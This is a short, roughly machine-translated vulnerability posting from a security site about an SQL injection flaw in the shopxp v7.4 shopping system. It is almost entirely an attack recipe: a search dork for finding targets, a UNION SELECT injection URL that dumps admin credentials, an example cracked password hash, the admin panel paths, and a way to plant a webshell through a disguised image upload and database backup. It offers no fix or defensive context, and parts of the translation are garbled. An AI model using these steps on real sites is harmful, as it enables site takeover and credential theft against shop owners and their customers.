shopxp online shopping system v7. 4 SQL injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201234043
Type myhack58
Reporter 佚名
Modified 2012-06-05T00:00:00


Keywords: inurl:shopxp_news. asp

Injected code: TEXTBOX2. ASP? action=modify&news%69d=1 2 2%20and%2 0 1=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

Broke the user name and password note: username and password are connected together, after the sixth bit is the password MD5 encrypted adminb1481eca94b12f75=====admin b1481eca94b12f75(3 8 9 8 3 8 0 6 )

Background:/admin or/admin_shopxp

Get the webshell method: put the pony to the picture format of the suffix is ready to upload, use the database backup to get webshell